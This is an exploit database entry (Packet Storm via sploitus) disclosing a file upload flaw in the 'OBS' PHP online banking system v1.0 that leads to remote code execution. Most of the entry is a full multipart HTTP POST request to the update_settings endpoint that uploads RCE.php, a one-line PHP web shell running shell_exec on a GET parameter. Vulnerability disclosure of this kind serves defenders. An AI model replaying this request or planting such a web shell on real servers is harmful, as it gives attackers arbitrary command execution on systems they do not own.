Exploit for OBS 1.0 Shell Upload

Name: Exploit for OBS 1.0 Shell Upload
Rating: 5 (45 reviews)
2025-01-16 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:188708
# Titles: OBS (by: oretnom23 ) v1.0 -Copyright © 2025. All rights reserved.
    ### File Upload-FU and Remote Code Execution-RCE Vulnerabilities
    # Author: nu11secur1ty
    # Date: 01/16/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html#comment-105993
    # Reference: https://portswigger.net/web-security/file-upload |
    https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
    
    ## Description:
    The update_settings app with parameter "cimg" is vulnerable for File Upload
    and then Remote Code Execution without any execution permission sanitizing.
    The attacker can upload absolutely DANGEROUS files on that server and he
    can destroy it with one click!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - RCE Exploit:
    
    ```RCE
    POST /pwnedhost/banking/classes/SystemSettings.php?f=update_settings
    HTTP/1.1
    Host: 192.168.100.45
    Cookie: PHPSESSID=7fd63jibgrngca52b9tpmi5psc
    Content-Length: 853
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundary6HD3dRMlU2C2zVV3
    Origin: https://192.168.100.45
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.100.45/pwnedhost/banking/admin/?page=system_info
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive
    
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="name"
    
    Online Banking System
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="short_name"
    
    OBS
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="about_us"
    
    <p>Sample About Us</p>
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="img"; filename="RCE.php"
    Content-Type: application/octet-stream
    
    <?php echo shell_exec($_GET["cmd"]);?>
    
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3
    Content-Disposition: form-data; name="cover"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundary6HD3dRMlU2C2zVV3--
    
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/obs-by-oretnom23-120115999)
    
    
    ## Time spent:
    00:35:00